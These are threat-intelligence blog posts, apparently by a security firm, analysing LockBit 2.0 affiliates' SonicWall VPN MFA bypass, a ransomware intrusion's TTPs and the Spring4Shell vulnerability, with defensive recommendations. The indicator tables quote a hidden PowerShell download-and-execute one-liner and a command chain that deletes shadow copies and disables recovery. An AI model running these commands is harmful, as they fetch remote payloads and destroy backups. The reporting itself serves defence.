MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques elaborated from the incident.

  • Active Scanning – T1595
  • Gather Victim Identity Information: Credentials – T1589.001
  • Credential Dumping – T1003
  • Account Discovery: Domain Account – T1087.002
  • Valid Accounts – T1078
  • Domain Accounts – T1078.002
  • Command and Scripting Interpreter – T1059
  • External Remote Services – T1133
  • Domain Trust Discovery – T1482
  • Remote System Discovery – T1018
  • Impair Defenses – T1562
  • OS Credential Dumping – T1003
  • File and Directory Discovery – T1083
  • Network Service Discovery – T1046
  • Network Share Discovery – T1135
  • System Information Discovery – T1082
  • Remote Access Software – T1219
  • Data Encrypted for Impact – T1486
  • Service Stop – T1489
  • Web Service – T1102
  • Lateral Tool Transfer – T1570
  • Remote Services – T1021
  • System Services: Service Execution – T1569.002
  • Ingress Tool Transfer – T1105
  • Remote Services: SMB/Windows Admin Shares – T1021.002
  • Exfiltration Over Web Service: Exfiltration to Cloud Storage – T1567.002
  • Transfer Data to Cloud Account – T1537
  • Data Encrypted for Impact – T1486

Indicators of Compromise (IoCs)

IndicatorType
C:\users\kenscchoi\desktop\sharefinder.ps1Script
svchost.exe -connect ip:8443 -pass passwordProcess execution
powershell.exe -nop -w hidden -c IEX ((new-object.netclient).downloadstring(“http[:]//ip[:]80/a’))Powershell execution
C:\Users\<user>\Desktop\locker.exe
C:Windows\locker.exe		Executable File
C:\ProgramData\AdFind.exeExecutable File
C:\ProgramData\system\svchost.exeExecutable File
C:\ProgramData\svchost.exeExecutable File
C:\users\<user>\videos\beacon.exeExecutable File
ProgramDataLocalSystem/Upload/beacon.exeExecutable File
SYSVOL\Users\<user>\Videos\beacon.exeExecutable File
C:\admin\.exeExecutable File
C:\windows\users\test\pictures\64\86.exeExecutable File
C:\windows\users\test\pictures\WebBrowserPassView.exeExecutable File
C:\windows\users\test\pictures\PsExec64.exeExecutable File
C:\windows\users\test\pictures\PsExec.exeExecutable File
C:\windows\users\test\pictures\Advanced_Port_Scanner_2.5.3869.exeExecutable File
C:\windows\system32\cmd.exe” /c “vssadmin.exe Delete Shadows /all /quietCommand Execution

Further information

Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.

Technical analysis of LockBit 2.0 affiliates’ SonicWall exploit that bypasses MFA  

Posted on by darklabhk

We outline the tactics, techniques and procedures of the threat actor, and share the technical details of the indicators of compromise for one of our incident response experiences in 1H2022.

In the previous blog post, we reported on the novel technique leveraged by LockBit 2.0 affiliates to  exploit SonicWall Secure Remote Access (SRA) Secure Sockets Layer Virtual Private Network (SSL VPN) appliance to retrieve the time-based one-time password (TOTP) which enabled the circumvention of the multi-factor authentication (MFA) access control. We identified at the point in time from open source internet search engines that over one hundred Hong Kong and Macau organisations may be susceptible to this exploit based on their reported use of potentially vulnerable appliances.

We follow-up on that blog post with a technical analysis that outlines the LockBit 2.0 affiliates’ Tactics, Techniques and Procedures (TTPs) as observed in our incident response experiences. In addition, we set the scene for our final blog post which will explore the potential factors that enables the LockBit Ransomware-as-a-Service (RaaS) group to continue innovating at a rapid pace and cement their position as a major player in the ransomware threat landscape.

Analysis and Exploitation in the wild

Reconnaissance

We observed through analysis on the SSLVPN appliance and firewall network traffic logs that either CVE-2019-7481 or CVE-2021-20028 was exploited twice prior to initial access. The first recorded instance was in late 2021, in which the affiliate obtained the credentials of an administrative account. We conclude this with high confidence given this credential had not been leaked via data breaches or to the Dark Web previously, while the user had adopted a strong password given its length and use of four password complexity character classes.

Over the next three months, each login attempt originated from a unique external IP address and were unsuccessful due to the enforcement of MFA. The exploit was executed again prior to successful initial access, again from a different IP address. The use of a different external IP address each time spread over a sporadic timeframe is a strong indication of likely malicious intent by a threat actor that sought to remain stealthy to avoid detection and triggering of the victim’s incident response protocols.

The list of known malicious IP addresses are listed below, and we posit with high confidence they are utilised by the same threat actor for the following reasons:

  • 91.219.212[.]214 – the first observed exploiting an SQLi vulnerability. This IP address has been reported multiple times as malicious from reputable sources to have conducted suspicious malicious activities, including spam, brute-forcing, web application abuse, and vulnerability exploitation.[1] 
  • 5.206.224[.]246 – the first unsuccessful attempt to login as an administrative user, suggesting that this IP address is associated with 91.219.212[.]214 to obtain and utilise the strong and complex password.
  • 51.91.221[.]111 – which resolves to 213.186.33[.]5 and has been flagged by the security community to be malicious and has served as a command-and-control infrastructure, i.e., Cobalt Strike server.[2]
  • 194.195.91[.]29 – the second observed exploitation of the SQLi vulnerability, with the subsequent login attempt being successful, indicating that the threat actor likely had chained it with the undisclosed zero-day vulnerability.

Initial Access

The threat actor gained access to the victim network by chaining an SQLi vulnerability – one of CVE-2019-7481 or CVE-2021-20028 – with an undisclosed zero-day vulnerability to circumvent the MFA access control of the victim’s SonicWall SRA SSLVPN. Details of the vulnerability chaining are illustrated in the below diagram.

Figure 1 – Holistic vulnerability chaining of SQLi vulnerability with undisclosed post-authentication zero-day vulnerability

Through our systematic method for discovering and analysing attack paths, we were able to replicate the exploited zero-day vulnerability performed by the threat actor. A summary of the undisclosed post-authentication local file inclusion zero-day vulnerability is provided below:

CVE(s)CVE-2022-22279
First Published Date11 March 2022
CVSS v34.9
Affected VersionsSonicWall SMA100 version 9.0.0.9-26sv and earlier.[3]
DescriptionPost-authentication vulnerability that enables threat actors to download the persist.db database on their local device by targeting endpoint’s /cgi-bin/sslvpnclient. extract valid user credentials from the settings.json file, including the username, encrypted passwords, and the TOTP.[4]
Potential ImpactSensitive information disclosure that enables threat actors to circumvent the MFA access control to impersonate valid users and obtain initial access to the victim’s network.
Proof of Concept (PoC) AvailableAt the time of writing, there were no publicly available PoCs identified. DarkLab reported the security vulnerability along with their PoC exploit code to SonicWall’s Product Security Incident Response Team (PSIRT), and on 12 April 2022 observed the release of the advisory acknowledging the vulnerability which we had disclosed.
Exploited in the WildAt the time of writing, this vulnerability is not known to be exploited in the wild.
Patch AvailableNo
Workaround AvailableNo

However, the threat actor required valid user credentials to exploit the post-authentication zero-day vulnerability. Based on this requirement and the victim’s firmware, we identified to two pre-authentication SQLi vulnerabilities – CVE-2019-7841 and CVE-2021-20028 – that the threat actor may have leveraged to obtain a valid session. A summary of these vulnerabilities are provided below:

CVE(s)CVE-2019-7841
First Published Date18 December 2019
CVSS v37.5
Affected VersionsPer SonicWall’s PSIRT, SMA100 version 9.0.0.3 and earlier.[5] However, we noted from a cybersecurity consultancy firm that devices with version 9.0.0.5 firmware and earlier were still vulnerable.[6]
DescriptionPre-authentication SQLi vulnerability in the customerTID parameter which can be exploited remotely. Successful exploitation would allow the threat actor to list active session identifiers for authenticated users in a table named Sessions.[7]
Potential ImpactSensitive information disclosure and initial access under the right conditions (i.e., no MFA access control).
Proof of Concept (PoC) AvailableAt the time of writing, there were no publicly available PoCs identified. However, security researchers have reportedly reproduced the exploit based on samples obtained from in-the-wild exploitation.[8]
Exploited in the WildThis vulnerability has been actively exploited in the wild reportedly since 8 June 2021.[9] SonicWall’s PSIRT published a notification on 13 July 2021 detailing an incident leveraging this vulnerability to perform a targeted ransomware attack.[10]
Patch AvailableYes for organisations running 9.x firmware. No for organisations running unpatched and end-of-life (EOL) 8.x firmware.[11]
Workaround AvailableNo
CVE(s)CVE-2021-20028
First Published Date14 July 2021
CVSS v39.8
Affected VersionsSonicWall SRA appliances running all 8.x firmware, an old version of firmware 9.x (9.0.0.9-26sv or earlier), or version 10.2.0.7.[12] However, we noted from a cybersecurity consultancy firm that devices with version 10.x firmware were potentially vulnerable.[13]
DescriptionPre-authentication SQLi vulnerability in the customerTID parameter which can be exploited remotely. Successful exploitation would allow the threat actor to list active session identifiers for authenticated users in a table named Sessions.[14]
Potential ImpactSensitive information disclosure and initial access under the right conditions (i.e., no MFA access control).
Proof of Concept (PoC) AvailablePer Twitter trails, we understand that the PoC was leaked on paste bins[15] by an alleged DarkSide and LockBit affiliate that goes by the name “Wazawaka” on 25 January 2022.[16] While the leak site is now inaccessible, we noted that security researchers have reportedly reproduced the exploit. [17], [18], and [19]
Exploited in the WildNo known mass exploitation in the wild.
Patch AvailableYes for organisations running 9.x firmware. No for organisations running unpatched and end-of-life (EOL) 8.x firmware.[20]
Workaround AvailableNo

Establishing Persistence

Upon login via the built-in SonicWall SRA SSLVPN administrative account, the threat actor did not require to perform privilege escalation as the threat actor obtained an account which, under the configurations at the time, was integrated with the victim’s Active Directory, and had been assigned domain administrator privileges. Thus, the threat actor cemented their position was to create an Active Directory account “audit” with similar privileges, and proceeded to perform the majority of subsequent malicious activities by leveraging this user.

Discovery

The threat actor transferred the SoftPerfect Network Scanner tool, which is a publicly available network scanner used to discover hostnames and network services, via various network protocols such as Hypertext Transfer Protocol (HTTP), Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), and Secure Shell (SSH).[21] The threat actor was able to launch the scanner to map out the internal network topology and identify additional critical systems.

Filenamenetscan.exe
SHA-256a710f573f73c163d54c95b4175706329db3ed89cd9337c583d0bb24b6a384789
File typeWin32 EXE
File size16,539,648 bytes

Lateral Movement

Subsequent to identifying the critical systems such as backup servers and the management information system, the threat actor leveraged the stolen administrative account as well as the created account “audit” to initiate a Remote Desktop Connection to access those endpoints.

Defense Evasion

The kavremover tool was staged and executed to disable the endpoint anti-virus solution Kaspersky on the critical systems.[22] This helped to set up the next stage of the campaign, which focuses on the exfiltration of victim data that will later be used for ransom.

Filenamekavremvr.exe
SHA-256c230e6a2a4f4ac182ba04fee875f722a2c9690cb5d678acd5e40a72d5ec1f275
File typeWin32 EXE
File size14,143,976 bytes

In addition, the executable file YDArk.exe was located on selected endpoints. This open source tool was first observed in the wild on 11 June 2020[23], with the commit available on GitHub for download.[24] From public sources, we note that it is a multi-purpose toolkit offered with English and Chinese modules that allow the threat actor to evade defenses through various techniques, including process injection and rootkit.[25] As a result, we posit this tool was downloaded with the intention of disabling the anti-virus solution such as Windows Defender, alongside the kavremover tool.

Exfiltration and Extortion

Initially, the threat actor makes it known to the target network that it has encrypted the network by leaving a ransom note on the impacted systems. In some cases, LockBit affiliates have been observed to stage hacking tools and to exfiltrate data to cloud storage platforms such as AnonFiles that enables users to anonymously access and share contents.[26] and [27]  

Exfiltration and Extortion

Ransomware deployment was observed to have been done manually, with the threat actors executing on the critical servers. Following the execution of Lockbit 2.0, threat actors typically move onto the extortion phase of the campaign, which is broken down into two stages; initial ransom note, and leak website.

FilenameLockBit_9C11F98C309ECD01.exe
SHA-256822b0d7dbf3bd201d6689e19b325b3982356c05bc425578db9aa4ce653deaaa7
File typeWin32 EXE
File size982,528 bytes

We provide a sample of the Lockbit 2.0 ransomware and several behaviours observed in our incident from available logs.

  • The ransomware enumerated connected drives and read the root path of hard drives other than the default C: drive and discovered additional drives connected to the infected system that the ransomware was able to propagate to and encrypt.
  • The ransomware deleted the Volume Shadow Copy Server (VSS), likely by running the following command:
    • C:\Windows\System32\cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  • Successfully encrypted files from Lockbit 2.0 had their file extension changed to .lockbit. Unlike typical cases, we did not observe the user background being modified using the \REGISTRY\USER\Control Panel\Desktop\Wallpaper registry

Finally, we observed that all the Active Directory accounts were disabled by the threat actor subsequent to the execution of Lockbit 2.0. In performing this action, legitimate users (e.g., administrators) were inhibited access to accounts, thereby delaying the actions that could be taken to restore the impacted systems and network.

Conclusion

Lockbit 2.0 affiliates work on behalf of the Lockbit group to conduct ransomware campaigns against organisations and industries across the globe. The affiliates’ abilities to conduct the intrusion and execution of Lockbit 2.0 ransomware vary, and through these incidents we observed affiliates with a diversified capability and skillset exploit a known SQLi vulnerability in a novel way to circumvent the MFA access control and obtain initial access. Organisations are encouraged to review the TTPs leveraged by LockBit affiliates as a result of our recent incident response experience to improve their preventive and detective controls.

Recommendations

As mentioned in the previous blog post, defending against undisclosed exploits are extremely challenging, but not impossible if organisations adopt a defense-in-depth approach. The following guiding principles should be observed, atop of those already listed in the previous blog post:

  • Implement a robust threat and vulnerability management programme that leverages cyber threat intelligence to achieve a resilient security posture. Specifically, to maintain an inventory of assets, with clear indication of the critical systems and sensitive data, mapped to business owners and the relevant security controls to manage cyber risk.
  • Design, implement, and operate an enterprise security architecture that embeds the concept of zero trust to focus on protecting critical resources (assets, services, workflows, network accounts, etc.), and not specifically just for network segments, as the network location is no longer seen as the prime component to the security posture of the resource.
  • Segment networks where operationally practical to prevent the spread of ransomware by controlling traffic flows between various subnetworks and by restricting adversary lateral movement. Disable unused administrative ports internally, such as Remote Desktop Protocol (RDP).
  • Identify, detect, and investigate abnormal activity and potential traversal of the threat actor across the network, such as through deployment of Endpoint Detection and Response (EDR) tools on critical endpoints, including workstations, laptops and servers.

In addition, we strongly urge organisations that have deployed the vulnerable versions of SonicWall SRA SSLVPN to execute the remediation actions outlined in the previous blog post, if not already completed.  Details can be found here.

MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques elaborated from the incident.

  • Reconnaissance: Active Scanning – Vulnerability Scanning (T1595.002)
  • Reconnaissance: Gather Victim Network Information – IP Addresses (T1590.005)
  • Initial Access: Exploit Public-Facing Application (T1190)
  • Initial Access: Valid Accounts (T1078)
  • Persistence: Account Manipulation (T1098)
  • Persistence: Create Account: Domain Account (T1136.002)
  • Privilege Escalation: Domain Accounts (T1078.002)
  • Defense Evasion: Impair Defenses: Disable or Modify Tools (T1562.001)
  • Defense Evasion: Indicator Removal on Host: File Deletion (T1070.004)
  • Credential Access: Credentials from Password Stores (T1555)
  • Discovery: Network Service Scanning (T1046)
  • Discovery: File and Directory Discovery (T1083)
  • Discovery: Remote System Discovery (T1018)
  • Lateral Movement: Remote Services: Remote Desktop Protocol (T1021.001)
  • Collection: Data from Local System (T1533)
  • Command and Control: Remote File Copy (T1544)
  • Impact: Account Access Removal (T1531)
  • Impact: Data Encrypted for Impact (T1486)
  • Impact: Inhibit System Recovery (T1490)

Indicators of Compromise (IoCs)

We include the observed IoCs elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

IndicatorType
c230e6a2a4f4ac182ba04fee875f722a2c9690cb5d678acd5e40a72d5ec1f275SHA-256
a710f573f73c163d54c95b4175706329db3ed89cd9337c583d0bb24b6a384789SHA-256
49bac09d18e35c58180ff08faa95d61f60a22fbb4186c6e8873c72f669713c8cSHA-256
822b0d7dbf3bd201d6689e19b325b3982356c05bc425578db9aa4ce653deaaa7SHA-256
91.219.212[.]214IPv4 Address
5.206.224[.]246IPv4 Address
51.91.221[.]111IPv4 Address
213.186.33[.]5IPv4 Address
194.195.91[.]29IPv4 Address
kavremvr.exeExecutable File
netscan.exeExecutable File
LockBit_9C11F98C309ECD01.exeExecutable File
YDArk.exeExecutable File
.lockbitEncrypted Files Extension
Restore-My-Files[.]txtFilename

Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.

LockBit 2.0 affiliate’s new SonicWall exploit bypasses MFA

Posted on by darklabhk

Increasing Capabilities of LockBit 2.0 Gang Per Our Incident Response Experience in Q1 2022 Impacts Over One Hundred Hong Kong and Macau Organisations; Exploit Acknowledged by SonicWall as CVE-2022-22279

In the first quarter of 2022, DarkLab responded to several ransomware incidents impacting organisations in the financial services, real estate, and manufacturing sectors across Hong Kong, China and Asia Pacific. In all such incidents, the presence of the LockBit executable file, .lockbit extension files, and the StealBit malware suggests that affiliates of the cybercriminal group that operates the LockBit 2.0 Ransomware-as-a-Service (RaaS) was likely behind the incidents.

LockBit 2.0 RaaS is a well-documented group with established tactics, techniques and procedures (TTPs) that has been active since 2019.[1] During our incident response investigations, we found LockBit affiliates exploiting two victims’ SonicWall Secure Remote Access (SRA) Secure Sockets Layer Virtual Private Network (SSLVPN) appliance to establish a foothold in their networks. In the first instance, the affiliate exploited a known SQL injection (SQLi) vulnerability to obtain valid usernames and passwords. Given the multi-factor authentication (MFA) access control was not enabled, they were able to achieve initial access relatively easily. In the second instance, the affiliate performed follow-up actions to retrieve the time-based one-time password (TOTP) which enabled the circumvention of the MFA access control.

In this blog post we will report on their novel technique to exploit SonicWall SSLVPN appliances and bypass MFA. According to results from open source internet search engines, over one hundred Hong Kong and Macau organisations may be susceptible to this exploit based on their reported use of potentially vulnerable appliances. This exploit disclosed by DarkLab has since been acknowledged by SonicWall as CVE-2022-22279.

A second blog post will then outline the LockBit affiliates’ TTPs as observed in our incident response experience. The final blog post will explore the potential factors that enables the LockBit RaaS group to continue innovating at a rapid pace and cement their position as a major player in the ransomware threat landscape.

Initial Access

The typical modus operandi of LockBit 2.0 affiliates is to gain access to a victim network by exploiting known vulnerabilities of public-facing services, including vulnerable SSLVPN. In particular, CVE-2018-13379 [2] has been the preferred vulnerability in many incidents, including those DarkLab responded to in January and February 2022. The vulnerability is several years old, and LockBit 2.0 affiliates were still able to capitalise on the exploit that allows for unauthenticated users to download system files through crafted HTTP resources requests. Other affiliates have been reported to gain initial access by conducting Remote Desktop Protocol (RDP) brute forcing[3] or through purchasing access to compromised servers via underground markets.[4]

However, in two incidents that DarkLab responded to in March 2022 we observed a new infection vector.  Affiliates were observed to exploit a known but relatively obscure SQLi vulnerability – either CVE-2019-7481 [5] or CVE-2021-20028 [6] – in a novel manner to retrieve user session data stored in the SonicWall SSLVPN appliance to the affiliate’s local endpoint. Retrieved data included valid usernames, passwords, and the TOTP. In doing so, the affiliates could circumvent the MFA access control, impersonate any user to gain initial access, and subsequently deploy ransomware.

Figure 1 – LockBit’s initial attack chain

The latter incidents we responded to in March 2022 were noteworthy for two reasons. First, LockBit affiliates were not reported to have exploited SonicWall SSLVPN products in the past. Second, this was the first publicly observed instance that the known SQLi vulnerability could be exploited by threat actors to extract the TOTP SHA-1 tokens of onboarded users. Affiliates could then generate the QR code containing the required information to generate one time passwords (OTP) in an authenticator app of their choice.[7] This proved to be an innovative way to circumvent the existing MFA access controls. The observation of the exploitation suggests the affiliates of LockBit now have additional tools in their arsenal, and indicates the importance they place in continuous improvement as the group looks to differentiate itself from competitors.

Impact to Hong Kong and Macau

DarkLab replicated and verified the novel exploitation method of the post-authentication vulnerability through internal testing of several known impacted SonicWall SSLVPN firmware. We have shared all relevant details, including the technical exploit code, with the SonicWall Product Security Incident Response Team (PSIRT) in March 2022 to ensure organisations are protected. We will not publicly disclose exact exploitation details to avoid replication by malicious actors.

Per subsequent communications with SonicWall PSIRT, we understood that the upgrades to SonicWall SMA firmware 10.2.0.7-34sv or above, and 9.0.0.10-28sv or above in February 2021 to address CVE-2021-20016 included comprehensive code-strengthening that proactively prevented malicious attackers from exploiting this vulnerability to circumvent the MFA access control.[8] On 12 April 2022, SonicWall PSIRT released the following advisory acknowledging the vulnerability CVE-2022-22279 which we had disclosed.[9]

As of the time of writing, we have not observed from our deep and dark web monitoring any specific intentions by threat actors to leverage this post-authentication vulnerability to target organisations in Hong Kong and Macau. However, we observed that Russian-speaking threat actors had been discussing this vulnerability in early February 2022, with posts from two underground forums – exploit[.]in and xss.[.]is – containing conversation details of purchasing the exploit code and outlining at a high-level the follow-up actions that can be taken to extract the TOTP from the active sessionid

Figure 2 – Screenshot of exploit[.]in underground forum
Figure 3 – Screenshot of xss[.]is underground forum

As a result of the LockBit incidents and various hacker chatter, we were concerned that local organisations may have missed SonicWall PSIRT’s advisory note; after all, we still observed compromises that resulted from the exploitation of CVE-2018-13379 on unpatched Fortinet SSLVPN appliances in February 2022. To that end, we conducted a passive, non-intrusive scan of both CVE-2019-7481 or CVE-2021-20028 on the full Internet Protocol address (IP address) range of Hong Kong and Macau. The preliminary results indicated that at least 100 organisations were vulnerable to CVE-2021-20028, with half of those also vulnerable to CVE-2019-7481.

DarkLab has since proactively contacted dozens of potentially affected organisations to alert them of the potential risks they faced. However, given there were a series of critical vulnerabilities pertaining to SonicWall SSLVPN appliances released in June 2021, it is likely that those may be exploited through other innovative methods by threat actors. For example, the Cybersecurity & Infrastructure Security Agency (CISA) listed CVE-2021-20016 as another SQLi vulnerability that allows a remote unauthenticated attacker to perform SQL query to access username password and other session related information in SMA100 build version 10.x. [10], which aligned with our communication with SonicWall’s PSIRT. We foresee that if left unpatched, this could pose a threat that adversaries may exploit to gain unauthorised access through exploitation of this vulnerability.

CVE NumberProductVulnerability NameDate Added to CatalogueShort Description
CVE-2021-20021SonicWall Email SecurityPrivilege Escalation Exploit Chain3 November 2021A vulnerability in version 10.0.9.x allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host.
CVE-2021-20022SonicWall Email SecurityPrivilege Escalation Exploit Chain3 November 2021A vulnerability in version 10.0.9.x allows a post-authenticated attacker to upload an arbitrary file to the remote host.
CVE-2021-20023SonicWall Email SecurityPrivilege Escalation Exploit Chain3 November 2021A vulnerability in version 10.0.9.x allows a post-authenticated attacker to read an arbitrary file on the remote host.
CVE-2021-20016SonicWall SSLVPN SMA100SQL Injection Vulnerability3 November 2021A vulnerability in SMA100 build version 10.x allows a remote unauthenticated attacker to perform SQL query to access username, password and other session related information.
CVE-2021-20018SMA 100 AppliancesStack-Based Buffer Overflow Vulnerability28 January 2022SonicWall SMA 100 devices are vulnerable to an unauthenticated stack-based buffer overflow vulnerability where exploitation can result in code execution.
CVE-2021-20028SonicWall SRASQL Injection Vulnerability28 March 2022SRA products contain an improper neutralisation of a SQL Command leading to SQL injection.
Table 1 – CISA known exploited vulnerabilities catalogue listing various critical SonicWall CVEs that were being exploited in the wild as of 2 April 2022

The ongoing evolution of TTPs allowed LockBit’s affiliates to become the most prolific ransomware actors in 2022. Between 1 January and 31 March 2022, the group claimed 223 victims on their dark web leak site, compared to Conti’s 125. This equates to more than one-third of all known ransomware incidents for Q1 2022. To put it in another way, over the same period LockBit’s affiliates claimed almost 10 percent more victims than the other 24 known ransomware groups combined (223 compared to 164). LockBit’s reported activities have also increased over the course of the first three months of 2022. The gang claimed 112 victims in March, while it published details of 111 companies in the previous two months combined. This suggest an ongoing trend highlighting how LockBit will likely remain the most active ransomware-as-a-service offering for the coming months.

Figure 4 – Number of victims published on ransomware dark web leak sites between 1 January 2022 and 31 March 2022

Conclusion

Lockbit 2.0 affiliates work on behalf of the Lockbit group to conduct ransomware campaigns against organisations and industries across the globe. The affiliates’ abilities to conduct the intrusion and execution of Lockbit 2.0 ransomware vary, and through these incidents we observed affiliates with a diversified capability and skillset exploit a known SQLi vulnerability in a novel way to circumvent the MFA access control and obtain initial access. At least 100 organisations in Hong Kong and Macau are at potential immediate risk, and we foresee that if left unpatched, this could pose a threat that adversaries may exploit to gain unauthorised access through exploitation of this vulnerability. We will continue to monitor the situation and assist organisations as needed. In the next blog post, we will also share further details on the TTPs leveraged by LockBit affiliates as a result of our recent incident response experience with reference to the MITRE ATT&CK Framework, such that organisations can better prevent and detect malicious activities related to this RaaS group.

Recommendations

For organisations that have deployed the vulnerable versions of SonicWall SRA SSLVPN, we recommend the following actions immediately in the following order:

  • Upgrade legacy SRA SSLVPN device(s) running firmware 8.x given they are not supported by SonicWall; apply patches to the impacted versions of the 9.x or 10.x firmware.
  • Reset all user account Active Directory credentials that had previously authenticated via the SonicWall SRA SSLVPN. In particular, the Active Directory credentials that is tied to the SonicWall SRA device for authentication purpose should be changed.
  • Re-bind users’ second authentication factor (e.g., Google or Microsoft Authenticator) app with an updated TOTP, and ensure that users store their newly generated backup codes securely.[11]
  • Review the privileges granted to the Active Directory account tied to the SonicWall SRA device for user authentication purpose, and remove excess permissions where possible to adhere to the principle of least privilege. In general, Domain Administrator privilege should not be used.
  • Perform a review of access management with respect to identity and network access (e.g., removal of legacy and unused accounts, housekeeping of privileges for all accounts, and enforce network segmentation to tighten access to key servers).

Meanwhile, defending against undisclosed exploits are extremely challenging, but not impossible if organisations adopt a defense-in-depth approach. The following guiding principles should be observed:

  • Require multi-factor authentication for all services to the extent possible, especially on external remote services. 
  • Implement a robust threat and vulnerability management programme that leverages cyber threat intelligence to achieve a resilient security posture. Specifically:
    • Maintain regular cybersecurity patching hygiene practices, including a robust baseline that patched known exploited vulnerabilities and aims to reduce known attack surface. 
    • Leverage cyber threat intelligence to prioritise the remediation scale and timeline on a risk-based approach, through the incorporation of indications and warnings regarding trending threats per available proof-of-concept code, active exploitation by threat actors, and Darknet chatter.
  • Maintain “tertiary” offline backups (i.e., tertiary backup) that are encrypted and immutable (i.e., cannot be altered or deleted). This should be atop of your existing secondary data backups that should adopt security best practices, in particular network segmentation with your production and/or primary site.
  • Develop and regularly test the business continuity plan, ensuring that the entire backup, restoration and recovery lifecycle is drilled to ensure the organisation’s operations are not severely interrupted.

MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

  • Initial Access: Exploit Public-Facing Application (T1190)
  • Initial Access: Valid Accounts (T1078)
  • Impact: Data Encrypted for Impact (T1486)

Indicators of Compromise (IoCs)

We include the observed IoCs elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

IndicatorType
7fcb724c6f5c392525e287c0728dbeb0MD5
adead34f060586f85114cd5222e8b3a277d563bdSHA-1
822b0d7dbf3bd201d6689e19b325b3982356c05bc425578db9aa4ce653deaaa7SHA-256
LockBit_9C11F98C309ECD01.exeExecutable File
.lockbitEncrypted Files Extension
91.219.212[.]214IPv4 Address
5.206.224[.]246IPv4 Address
51.91.221[.]111IPv4 Address
213.186.33[.]5IPv4 Address
194.195.91[.]29IPv4 Address

Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.

Thousands of organisations in Hong Kong and Macau impacted by Spring Core Remote Code Execution Vulnerability

Posted on by darklabhk

Impacted organisations include financial services and critical infrastructure providers

On 29 March 2022, security researchers posted a now-removed screenshot to Twitter purporting to show a trivially-exploited unauthenticated remote code execution (RCE) vulnerability in the Spring Framework, one of the most popular Java frameworks in use globally.[1] While the screenshot did not include a proof of concept or public details, Proof of Concepts dubbed “SpringShell” or “Spring4Shell” have since emerged since 30 March 2022 and have been validated by DarkLab to be working exploits.[2]

The Spring Framework is among the most widely used lightweight open source framework for Java, as a result of its design philosophy that enables developers to focus on business logic, while simplifying the development cycle of Java enterprise applications.[3] Given its widespread use globally, the nature of the vulnerability being more general such that there may be unknown and additional ways of exploiting it, the impact of this vulnerability is compounded significantly and would be in excess of the impact observed for infamous vulnerabilities such as Log4Shell (CVE-2021-44228).

Technical Analysis

Based on analysis on consolidated data source and technical analysis, DarkLab has been able to recreate the attack in a simulated environment. In order to exploit this vulnerability, an unauthenticated attacker must send a crafted HTTP request to trigger the mechanisms through parameter binding functions of the framework to achieve arbitrary file write, with calls to specific Java ‘classLoader’/’pipeline’ functions. It is likely that the Spring Framework does not handle these calls properly, allowing for arbitrary writing of the JSP web shell to the root directory of the server, which can then be interacted with for unauthenticated remote code execution.

Figure 1 – redacted screenshot of successful simulated exploitation of RCE vulnerability that landed us a JSP web shell at the backend server

DarkLab has been actively performing discovery using our proprietary PoC since 30 March 2022.  As a result of conducting the scan across all external facing applications in Hong Kong and Macau, we observed that over thousands of organisations – including financial services and critical infrastructure providers – are potentially vulnerable to the unauthenticated RCE vulnerability. At the time of writing, the scope of impacted organisations and the broader implications of exploitation are still being estimated and not fully known, as it depends on whether particular functions are used within the Spring application.[4] The general nature of the vulnerability implies there may be other still undiscovered methods to exploit it.

Probability of Exploitation by Threat Actors

Given that this is an unauthenticated RCE vulnerability in the widely-adopted Spring Framework, it is likely that it will present an attractive exploit for a variety of threat actors to weaponize and add to their arsenal for the purpose of obtaining initial access to unsuspecting victims’ systems.

Per DarkLab’s Deep and Dark Web monitoring, we observed on 29 March 2022 that English-speaking threat actors had exchanged messages via Telegram requesting for a working exploit code. While we are unable to ascertain with confidence whether they obtained this information through communication exchange, we observed clear intent from these threat actors to leverage the unauthenticated RCE vulnerability to perform malicious activities against a specific range of targets. This includes exfiltrating sensitive personally identifiable information from South Asian state-owned enterprises, which suggests that these threat actors have a more targeted mindset and are capable of directing their attention to the observed vulnerable organisations in Hong Kong and Macau should it align with their objectives.

While there has not been active exploitation in the wild for Spring4Shell, we posit that threat actors of various objectives – ranging from espionage to financial motivation – will continue to invest resources to explore how best to weaponise the vulnerability to achieve their goals. DarkLab will continue to monitor the Deep and Dark Web for more insights on their innovations and targeting and provide updates as necessary.

Conclusion

In summary, this unauthenticated RCE vulnerability in the widely-adopted Spring Core makes it an attractive proposition for threat actors of all profiles and motivations. In particular, the general nature of the vulnerability implies there may be other ways to exploit it. As a result, we expect threat actors of all motivations will invest resources to innovate new techniques; until then, detection opportunities will remain limited. This implies that teams should first rely on their defense-in-depth security controls to mitigate the known risks, while continuing to track the status of this vulnerability regarding preventive and detective controls as they become publicly available.

Recommendations

Organisations using affected versions 5.3.x should upgrade to 5.3.18+, while versions 5.2.x should upgrade to 5.2.20+. However, there are other workaround solutions for applications that cannot upgrade to the above versions as listed on the Spring blog post.[5]

From a detection perspective, exploitation attempts will require HTTP requests making use of Java classes. As such, filtering for strings such as “class.“, “Class.“, “.class.“, and “.Class.” may detect exploitation attempts.

In addition, we strongly urge our clients to consider the following:

  • Review their application stack to ascertain the scope of impact in preparation for the impending patch to be released.
  • Monitor the official Spring vulnerability report [6] or Git repository for further updates to the patch releases and apply accordingly.[7]
  • Leverage cyber threat intelligence to monitor for further updates to the threat landscape as a result of new information pertaining to the unauthenticated RCE vulnerability.

MITRE ATT&CK TTPs Leveraged

  • Initial Access: Exploit Public-Facing Application (T1190)
  • Execution: Exploitation for Client Execution (T1203)
  • Persistence: Server Software Component – Web Shell (T1505.003)
  • Command and Control: Application Layer Protocol – Web Protocols (T1071.001)

Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.